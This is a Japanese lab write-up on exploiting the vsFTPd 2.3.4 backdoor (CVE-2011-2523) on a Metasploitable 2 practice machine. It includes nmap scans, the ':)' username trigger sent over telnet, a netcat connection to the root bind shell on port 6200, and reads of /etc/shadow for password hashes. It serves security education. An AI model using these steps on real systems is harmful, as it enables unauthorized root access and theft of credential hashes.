
プロジェクト: Metasploitable 2 における vsFTPd 2.3.4 バックドアの悪用 (CVE-2011-2523)
このプロジェクトは、意図的に脆弱性を持たせたマシン Metasploitable 2 に対するペネトレーションテストのワークフローを示しています。 目的は、FTPサービスの既知の脆弱性を特定、悪用、分析し、最終的に rootレベルのアクセス を達成し、セキュリティへの影響を評価することでした。
192.168.56.0/24)ターゲットシステムとそのネットワーク構成を確認しました:
whoami
hostname
ifconfig

攻撃マシンとターゲット間のネットワーク接続を確認しました:
ping 192.168.56.101

vsFTPd 2.3.4) を検出ホスト発見を実行:
nmap -sn 192.168.56.0/24
ネットワーク上のアクティブホストを特定しました。

nmap 192.168.56.101
次のような複数の開放ポートを発見:

nmap -sV 192.168.56.101
実行中のFTPサービスを特定:
vsFTPd 2.3.4
完全なサービスおよびスクリプトベースのスキャンはサポートファイルに含まれています: Nmapスキャン出力。

FTPサービスは既知の脆弱なバージョンを実行していました:
vsFTPd 2.3.4
このバージョンのvsFTPdは、認証中に :) を含むユーザー名が使用されるとトリガーされる悪意のあるバックドアとともに配布されました。
起動後、サービスはポート 6200 にバインドシェルを開き、不正なリモートアクセスを許可します。
Telnetを使用してバックドアをトリガー:
telnet 192.168.56.101 21
USER test:)
PASS test

Netcatを使用してバックドアに接続:
nc 192.168.56.101 6200

whoami
root
rootアクセスを正常に取得

rootアクセスを取得後、基本的なシステム列挙を実行しました:
cat /etc/passwd
cat /etc/shadow
/etc/shadow からハッシュ化された資格情報を取得

このラボは、単一の脆弱なサービスがどのように 完全なシステム侵害 につながるかを示しています。 適切なサービスの設定、パッチ管理、露出した攻撃面の最小化の重要性を強調しています。
これは、実際のバックドアを手動で悪用した初めての経験でした。単一の悪意のあるユーザー名文字列 (:)) がどのようにしてrootレベルのアクセスをトリガーできるかを学び、偵察においてサービス列挙とバージョン検出がなぜそれほど重要かを再認識しました。また、/etc/shadow の読み取りやハッシュ化された資格情報が実際にどのようなものかを理解するなど、基本的なLinuxのポストエクスプロイトコマンドにも慣れることができました。
これは、意図的に脆弱性を持たせたマシンであるMetasploitable 2を使用した管理されたラボ環境でした。vsFTPd 2.3.4のバックドアは2011年の既知のCVE (CVE-2011-2523) であり、現代の実際のエンゲージメントを反映したものではありません。実際の評価では、回避、ログバイパス、ピボットなどの追加手順が必要になります。このプロジェクトは、完全なペネトレーションテストではなく、コアとなるエクスプロイトのメカニズムを理解することに焦点を当てています。